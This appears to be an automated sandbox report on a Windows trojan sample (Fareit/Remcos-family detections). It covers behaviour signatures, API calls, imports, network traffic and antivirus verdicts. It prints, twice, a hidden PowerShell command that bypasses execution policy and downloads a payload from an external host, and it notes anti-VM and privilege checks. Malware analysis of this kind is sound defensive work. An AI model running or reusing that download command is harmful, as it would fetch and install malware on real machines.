cmdline powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command tas;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495')
Drops a binary and executes it (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
A process created a hidden window (2 events)
Time & API Arguments Status Return Repeated
1619269230.991633
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
show_type: 0
success 1 0
1619301871.844374
CreateProcessInternalW
thread_identifier: 2456
thread_handle: 0x00000084
process_identifier: 520
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command tas;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000080
inherit_handles: 1
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619301880.156999
GetAdaptersAddresses
flags: 15
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 event)
entropy 7.866997886945607 section {'size_of_data': '0x00018a00', 'virtual_address': '0x000ac000', 'entropy': 7.866997886945607, 'name': 'DATA', 'virtual_size': '0x0001881c'} description A section with a high entropy has been found
URL downloaded by powershell script (2 events)
Data received 
Data received F
PowerShell is sending data to a remote host (2 events)
Data sent so`„%{.¶¨EÏþô{EW³¯æ5 E]n7.Á!娺Í/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
Data sent so`„%}6Zî ¢•ö³!D]…IŽøPÂù-¾?̟/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time & API Arguments Status Return Repeated
1619301875.859999
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Network communication
Communicates with host for which no DNS query was performed (3 events)
host 104.21.6.87
host 172.217.24.14
host 222.216.123.6
Deletes executed files from disk (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)
Time & API Arguments Status Return Repeated
1619301883.281999
send
buffer: so`„%{.¶¨EÏþô{EW³¯æ5 E]n7.Á!娺Í/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
socket: 1376
sent: 120
success 120 0
1619301885.296999
send
buffer: so`„%}6Zî ¢•ö³!D]…IŽøPÂù-¾?̟/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
socket: 1376
sent: 120
success 120 0
Creates a suspicious PowerShell process (3 events)
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
Generates some ICMP traffic
File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.Delf.FareIt.Gen.13
ALYac Trojan.Delf.FareIt.Gen.13
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 0055e7d01 )
Alibaba Trojan:Win32/Injector.9d9b71b5
K7GW Trojan ( 0055e7d01 )
Cybereason malicious.cc4f31
Arcabit Trojan.Delf.FareIt.Gen.13
Cyren W32/Injector.TQYQ-5604
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:Inject-XW [Trj]
BitDefender Trojan.Delf.FareIt.Gen.13
NANO-Antivirus Trojan.Win32.Buzus.gtcbnv
Paloalto generic.ml
Rising Trojan.Kryptik!1.C56D (CLASSIC)
Ad-Aware Trojan.Delf.FareIt.Gen.13
Emsisoft Trojan.Delf.FareIt.Gen.13 (B)
Comodo Malware@#sf2xnd9as17x
F-Secure Heuristic.HEUR/AGEN.1105001
DrWeb Trojan.DownLoader32.45107
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R06EC0PIA20
McAfee-GW-Edition BehavesLike.Win32.Fareit.dh
FireEye Trojan.Delf.FareIt.Gen.13
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Injector
Avira HEUR/AGEN.1105001
MAX malware (ai score=89)
Antiy-AVL Trojan/Win32.Sonbokli
Microsoft Trojan:Win32/RemcosCrypt.ACH!MTB
AegisLab Trojan.Win32.Generic.4!c
GData Win32.Trojan.Buzus.C
Cynet Malicious (score: 85)
AhnLab-V3 Malware/Win32.Generic.C3971808
McAfee Fareit-FRD!23867DECC4F3
VBA32 TScope.Trojan.Delf
Malwarebytes Backdoor.Remcos
Zoner Trojan.Win32.87797
ESET-NOD32 a variant of Win32/Injector.EJUL
TrendMicro-HouseCall TROJ_GEN.R06EC0PIA20
Tencent Win32.Trojan.Generic.Hqbu
MaxSecure Trojan.Malware.74813238.susgen
Fortinet W32/Injector.EKCN!tr
BitDefenderTheta Gen:NN.ZelphiF.34700.5GW@a0cwkUni
AVG Win32:Inject-XW [Trj]
Panda Trj/GdSda.A
Visual analysis
Binary image
No binary image: this sample did not generate a binary visualization image
Runtime screenshots
No runtime screenshots: no screenshots were captured while the sample ran

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x4c61a0 VirtualFree
0x4c61a4 VirtualAlloc
0x4c61a8 LocalFree
0x4c61ac LocalAlloc
0x4c61b0 GetVersion
0x4c61b4 GetCurrentThreadId
0x4c61c0 VirtualQuery
0x4c61c4 WideCharToMultiByte
0x4c61c8 MultiByteToWideChar
0x4c61cc lstrlenA
0x4c61d0 lstrcpynA
0x4c61d4 LoadLibraryExA
0x4c61d8 GetThreadLocale
0x4c61dc GetStartupInfoA
0x4c61e0 GetProcAddress
0x4c61e4 GetModuleHandleA
0x4c61e8 GetModuleFileNameA
0x4c61ec GetLocaleInfoA
0x4c61f0 GetCommandLineA
0x4c61f4 FreeLibrary
0x4c61f8 FindFirstFileA
0x4c61fc FindClose
0x4c6200 ExitProcess
0x4c6204 WriteFile
0x4c620c RtlUnwind
0x4c6210 RaiseException
0x4c6214 GetStdHandle
Library user32.dll:
0x4c621c GetKeyboardType
0x4c6220 LoadStringA
0x4c6224 MessageBoxA
0x4c6228 CharNextA
Library advapi32.dll:
0x4c6230 RegQueryValueExA
0x4c6234 RegOpenKeyExA
0x4c6238 RegCloseKey
Library oleaut32.dll:
0x4c6240 SysFreeString
0x4c6244 SysReAllocStringLen
0x4c6248 SysAllocStringLen
Library kernel32.dll:
0x4c6250 TlsSetValue
0x4c6254 TlsGetValue
0x4c6258 LocalAlloc
0x4c625c GetModuleHandleA
Library advapi32.dll:
0x4c6264 RegQueryValueExA
0x4c6268 RegOpenKeyExA
0x4c626c RegCloseKey
Library kernel32.dll:
0x4c6274 lstrcpyA
0x4c6278 WriteFile
0x4c627c WaitForSingleObject
0x4c6280 VirtualQuery
0x4c6284 VirtualProtect
0x4c6288 VirtualAlloc
0x4c628c Sleep
0x4c6290 SizeofResource
0x4c6294 SetThreadLocale
0x4c6298 SetFilePointer
0x4c629c SetFileAttributesA
0x4c62a0 SetEvent
0x4c62a4 SetErrorMode
0x4c62a8 SetEndOfFile
0x4c62ac ResetEvent
0x4c62b0 ReadFile
0x4c62b4 MultiByteToWideChar
0x4c62b8 MulDiv
0x4c62bc LockResource
0x4c62c0 LoadResource
0x4c62c4 LoadLibraryA
0x4c62d0 GlobalUnlock
0x4c62d4 GlobalReAlloc
0x4c62d8 GlobalHandle
0x4c62dc GlobalLock
0x4c62e0 GlobalFree
0x4c62e4 GlobalFindAtomA
0x4c62e8 GlobalDeleteAtom
0x4c62ec GlobalAlloc
0x4c62f0 GlobalAddAtomA
0x4c62f4 GetVersionExA
0x4c62f8 GetVersion
0x4c62fc GetTickCount
0x4c6300 GetThreadLocale
0x4c6304 GetSystemInfo
0x4c6308 GetStringTypeExA
0x4c630c GetStdHandle
0x4c6310 GetProcAddress
0x4c6314 GetModuleHandleA
0x4c6318 GetModuleFileNameA
0x4c631c GetLocaleInfoA
0x4c6320 GetLocalTime
0x4c6324 GetLastError
0x4c6328 GetFullPathNameA
0x4c632c GetFileAttributesA
0x4c6334 GetDiskFreeSpaceA
0x4c6338 GetDateFormatA
0x4c633c GetCurrentThreadId
0x4c6340 GetCurrentProcessId
0x4c6344 GetComputerNameA
0x4c6348 GetCPInfo
0x4c634c GetACP
0x4c6350 FreeResource
0x4c6354 InterlockedExchange
0x4c6358 FreeLibrary
0x4c635c FormatMessageA
0x4c6360 FindResourceA
0x4c6364 FindFirstFileA
0x4c6368 FindClose
0x4c6374 EnumCalendarInfoA
0x4c637c DeleteFileA
0x4c6384 CreateThread
0x4c6388 CreateFileA
0x4c638c CreateEventA
0x4c6390 CompareStringA
0x4c6394 CloseHandle
Library version.dll:
0x4c639c VerQueryValueA
0x4c63a4 GetFileVersionInfoA
Library gdi32.dll:
0x4c63ac UnrealizeObject
0x4c63b0 StretchBlt
0x4c63b4 SetWindowOrgEx
0x4c63b8 SetWindowExtEx
0x4c63bc SetWinMetaFileBits
0x4c63c0 SetViewportOrgEx
0x4c63c4 SetViewportExtEx
0x4c63c8 SetTextColor
0x4c63cc SetStretchBltMode
0x4c63d0 SetROP2
0x4c63d4 SetPixel
0x4c63d8 SetMapMode
0x4c63dc SetEnhMetaFileBits
0x4c63e0 SetDIBColorTable
0x4c63e4 SetBrushOrgEx
0x4c63e8 SetBkMode
0x4c63ec SetBkColor
0x4c63f0 SelectPalette
0x4c63f4 SelectObject
0x4c63f8 SelectClipRgn
0x4c63fc SaveDC
0x4c6400 RestoreDC
0x4c6404 Rectangle
0x4c6408 RectVisible
0x4c640c RealizePalette
0x4c6410 Polyline
0x4c6414 Polygon
0x4c6418 PolyPolyline
0x4c641c PlayEnhMetaFile
0x4c6420 PatBlt
0x4c6424 MoveToEx
0x4c6428 MaskBlt
0x4c642c LineTo
0x4c6430 IntersectClipRect
0x4c6434 GetWindowOrgEx
0x4c6438 GetWinMetaFileBits
0x4c643c GetTextMetricsA
0x4c6440 GetTextExtentPointA
0x4c644c GetStockObject
0x4c6450 GetPixel
0x4c6454 GetPaletteEntries
0x4c6458 GetObjectA
0x4c6464 GetEnhMetaFileBits
0x4c6468 GetDeviceCaps
0x4c646c GetDIBits
0x4c6470 GetDIBColorTable
0x4c6474 GetDCOrgEx
0x4c647c GetClipBox
0x4c6480 GetBrushOrgEx
0x4c6484 GetBitmapBits
0x4c6488 GdiFlush
0x4c648c ExtTextOutA
0x4c6490 ExtCreatePen
0x4c6494 ExcludeClipRect
0x4c6498 DeleteObject
0x4c649c DeleteEnhMetaFile
0x4c64a0 DeleteDC
0x4c64a4 CreateSolidBrush
0x4c64a8 CreatePenIndirect
0x4c64ac CreatePalette
0x4c64b4 CreateFontIndirectA
0x4c64b8 CreateDIBitmap
0x4c64bc CreateDIBSection
0x4c64c0 CreateCompatibleDC
0x4c64c8 CreateBrushIndirect
0x4c64cc CreateBitmap
0x4c64d0 CopyEnhMetaFileA
0x4c64d4 BitBlt
Library user32.dll:
0x4c64dc CreateWindowExA
0x4c64e0 WindowFromPoint
0x4c64e4 WinHelpA
0x4c64e8 WaitMessage
0x4c64ec ValidateRect
0x4c64f0 UpdateWindow
0x4c64f4 UnregisterClassA
0x4c64f8 UnionRect
0x4c64fc UnhookWindowsHookEx
0x4c6500 TranslateMessage
0x4c6508 TrackPopupMenu
0x4c6510 ShowWindow
0x4c6514 ShowScrollBar
0x4c6518 ShowOwnedPopups
0x4c651c ShowCursor
0x4c6520 ShowCaret
0x4c6524 SetWindowsHookExA
0x4c6528 SetWindowTextA
0x4c652c SetWindowPos
0x4c6530 SetWindowPlacement
0x4c6534 SetWindowLongA
0x4c6538 SetTimer
0x4c653c SetScrollRange
0x4c6540 SetScrollPos
0x4c6544 SetScrollInfo
0x4c6548 SetRect
0x4c654c SetPropA
0x4c6550 SetParent
0x4c6554 SetMenuItemInfoA
0x4c6558 SetMenu
0x4c655c SetKeyboardState
0x4c6560 SetForegroundWindow
0x4c6564 SetFocus
0x4c6568 SetCursor
0x4c656c SetClipboardData
0x4c6570 SetClassLongA
0x4c6574 SetCapture
0x4c6578 SetActiveWindow
0x4c657c SendMessageA
0x4c6580 ScrollWindowEx
0x4c6584 ScrollWindow
0x4c6588 ScreenToClient
0x4c658c RemovePropA
0x4c6590 RemoveMenu
0x4c6594 ReleaseDC
0x4c6598 ReleaseCapture
0x4c65a4 RegisterClassA
0x4c65a8 RedrawWindow
0x4c65ac PtInRect
0x4c65b0 PostQuitMessage
0x4c65b4 PostMessageA
0x4c65b8 PeekMessageA
0x4c65bc OpenClipboard
0x4c65c0 OffsetRect
0x4c65c4 OemToCharA
0x4c65c8 MessageBoxA
0x4c65cc MessageBeep
0x4c65d0 MapWindowPoints
0x4c65d4 MapVirtualKeyA
0x4c65d8 LoadStringA
0x4c65dc LoadKeyboardLayoutA
0x4c65e0 LoadIconA
0x4c65e4 LoadCursorA
0x4c65e8 LoadBitmapA
0x4c65ec KillTimer
0x4c65f0 IsZoomed
0x4c65f4 IsWindowVisible
0x4c65f8 IsWindowEnabled
0x4c65fc IsWindow
0x4c6600 IsRectEmpty
0x4c6604 IsIconic
0x4c6608 IsDialogMessageA
0x4c660c IsChild
0x4c6610 IsCharAlphaNumericA
0x4c6614 IsCharAlphaA
0x4c6618 InvalidateRect
0x4c661c IntersectRect
0x4c6620 InsertMenuItemA
0x4c6624 InsertMenuA
0x4c6628 InflateRect
0x4c662c HideCaret
0x4c6634 GetWindowTextA
0x4c6638 GetWindowRect
0x4c663c GetWindowPlacement
0x4c6640 GetWindowLongA
0x4c6644 GetWindowDC
0x4c6648 GetTopWindow
0x4c664c GetSystemMetrics
0x4c6650 GetSystemMenu
0x4c6654 GetSysColorBrush
0x4c6658 GetSysColor
0x4c665c GetSubMenu
0x4c6660 GetScrollRange
0x4c6664 GetScrollPos
0x4c6668 GetScrollInfo
0x4c666c GetPropA
0x4c6670 GetParent
0x4c6674 GetWindow
0x4c6678 GetMessageTime
0x4c667c GetMenuStringA
0x4c6680 GetMenuState
0x4c6684 GetMenuItemInfoA
0x4c6688 GetMenuItemID
0x4c668c GetMenuItemCount
0x4c6690 GetMenu
0x4c6694 GetLastActivePopup
0x4c6698 GetKeyboardState
0x4c66a0 GetKeyboardLayout
0x4c66a4 GetKeyState
0x4c66a8 GetKeyNameTextA
0x4c66ac GetIconInfo
0x4c66b0 GetForegroundWindow
0x4c66b4 GetFocus
0x4c66b8 GetDoubleClickTime
0x4c66bc GetDlgItem
0x4c66c0 GetDesktopWindow
0x4c66c4 GetDCEx
0x4c66c8 GetDC
0x4c66cc GetCursorPos
0x4c66d0 GetCursor
0x4c66d4 GetClipboardData
0x4c66d8 GetClientRect
0x4c66dc GetClassNameA
0x4c66e0 GetClassInfoA
0x4c66e4 GetCaretPos
0x4c66e8 GetCapture
0x4c66ec GetActiveWindow
0x4c66f0 FrameRect
0x4c66f4 FindWindowA
0x4c66f8 FillRect
0x4c66fc EqualRect
0x4c6700 EnumWindows
0x4c6704 EnumThreadWindows
0x4c670c EndPaint
0x4c6710 EndDeferWindowPos
0x4c6714 EnableWindow
0x4c6718 EnableScrollBar
0x4c671c EnableMenuItem
0x4c6720 EmptyClipboard
0x4c6724 DrawTextA
0x4c6728 DrawStateA
0x4c672c DrawMenuBar
0x4c6730 DrawIconEx
0x4c6734 DrawIcon
0x4c6738 DrawFrameControl
0x4c673c DrawFocusRect
0x4c6740 DrawEdge
0x4c6744 DispatchMessageA
0x4c6748 DestroyWindow
0x4c674c DestroyMenu
0x4c6750 DestroyIcon
0x4c6754 DestroyCursor
0x4c6758 DeleteMenu
0x4c675c DeferWindowPos
0x4c6760 DefWindowProcA
0x4c6764 DefMDIChildProcA
0x4c6768 DefFrameProcA
0x4c676c CreatePopupMenu
0x4c6770 CreateMenu
0x4c6774 CreateIcon
0x4c6778 CloseClipboard
0x4c677c ClientToScreen
0x4c6780 CheckMenuItem
0x4c6784 CallWindowProcA
0x4c6788 CallNextHookEx
0x4c678c BeginPaint
0x4c6790 BeginDeferWindowPos
0x4c6794 CharNextA
0x4c6798 CharLowerBuffA
0x4c679c CharLowerA
0x4c67a0 CharUpperBuffA
0x4c67a4 CharToOemA
0x4c67a8 AdjustWindowRectEx
Library kernel32.dll:
0x4c67b4 Sleep
Library oleaut32.dll:
0x4c67bc SafeArrayPtrOfIndex
0x4c67c0 SafeArrayPutElement
0x4c67c4 SafeArrayGetElement
0x4c67cc SafeArrayAccessData
0x4c67d0 SafeArrayGetUBound
0x4c67d4 SafeArrayGetLBound
0x4c67d8 SafeArrayCreate
0x4c67dc VariantChangeType
0x4c67e0 VariantCopyInd
0x4c67e4 VariantCopy
0x4c67e8 VariantClear
0x4c67ec VariantInit
Library ole32.dll:
0x4c67f4 CoTaskMemFree
0x4c67f8 ProgIDFromCLSID
0x4c67fc StringFromCLSID
0x4c6800 CoCreateInstance
0x4c6804 CoUninitialize
0x4c6808 CoInitialize
0x4c680c IsEqualGUID
Library oleaut32.dll:
0x4c6814 GetErrorInfo
0x4c6818 GetActiveObject
0x4c681c SysFreeString
Library comctl32.dll:
0x4c682c ImageList_Write
0x4c6830 ImageList_Read
0x4c6840 ImageList_DragMove
0x4c6844 ImageList_DragLeave
0x4c6848 ImageList_DragEnter
0x4c684c ImageList_EndDrag
0x4c6850 ImageList_BeginDrag
0x4c6854 ImageList_Remove
0x4c6858 ImageList_DrawEx
0x4c685c ImageList_Replace
0x4c6860 ImageList_Draw
0x4c6870 ImageList_Add
0x4c687c ImageList_Destroy
0x4c6880 ImageList_Create
Library shell32.dll:
0x4c6888 ShellExecuteA
Library comdlg32.dll:
0x4c6890 GetOpenFileNameA
Library winmm.dll:
0x4c6898 sndPlaySoundA
Library kernel32.dll:
0x4c68a0 MulDiv

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
104.21.6.87 443 192.168.56.101 49204
192.168.56.101 49181 195.133.192.17 share.dmca.gripe 443
192.168.56.101 49182 195.133.192.17 share.dmca.gripe 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.